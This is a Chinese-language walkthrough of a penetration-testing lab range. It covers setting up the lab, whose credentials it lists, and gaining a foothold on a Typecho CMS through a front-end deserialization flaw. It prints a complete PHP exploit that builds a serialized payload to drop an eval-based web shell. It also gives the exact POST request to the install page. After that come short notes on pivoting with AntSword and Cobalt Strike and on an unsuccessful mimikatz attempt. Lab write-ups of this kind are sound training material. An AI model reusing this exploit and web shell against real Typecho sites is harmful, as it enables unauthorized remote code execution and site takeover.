环境配置

首先是WEB它有3个快照分别对应的是iis、weblogic、typechoCMS
接着是linux就开放了一个22端口,服务嘛啥也没有
1 2 3
| V3.2 web\de1ay | 1qaz!QAZ1qaz!QAZ de1ay\de2ay | 1qaz@WSX!QAZ2wsx
|
首先要进入web靶机启动phpstudy,它这里ip是写死的静态ip,如果要修改需要进入web\de1ay账号修改ip设置
扫下端口开放情况,只开发了80,3306,这里的80使用phpstudy起的一个typecho

打开发现报错

进入靶机打开phpstudy启动服务,先关闭iis,在删除网站根目录的config.inc.php,重新安装typecho,先进入数据库新建一个typecho的库,然后访问如下url,进行重新安装

然后又报了一个类错误,直接从官网从新下一个,2017年10月24日之前的所有版本都存在此靶场要利用的漏洞
外网打点
typecho反序列化前台getshell
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
| <?php class Typecho_Request { private $_params = array(); private $_filter = array();
public function __construct() { $this->_params['screenName'] = 'echo ^<?php @eval($_POST["b1ank"]);?^>>shell.php'; $this->_filter[0] = 'system'; } } class Typecho_Feed{ const RSS2 = 'RSS 2.0'; private $_items = array(); private $_type; function __construct() { $this->_type = self::RSS2; $_item['author'] = new Typecho_Request(); $_item['category'] = array(new Typecho_Request()); $this->_items[0] = $_item; } } $exp = new Typecho_Feed(); $a = array( 'adapter'=>$exp, 'prefix' =>'typecho_' ); echo urlencode(base64_encode(serialize($a))); ?>
|
用post提交数据
url:http://192.168.31.10/typecho/install.php?finish=a
Postdata:__typecho_config=前面脚本生成的
Referrer:http://192.168.31.10/typecho

内网渗透
连上蚁剑,上线到cs提权

信息收集发现还有一个网段

探测10网段存活主机

看很多文章后面就是mimikatz抓取明文密码,然后域横向,但是我这里mimikatz根本没有抓到明文密码

这个环境没搞懂,应该还有很多内容,没这么简单的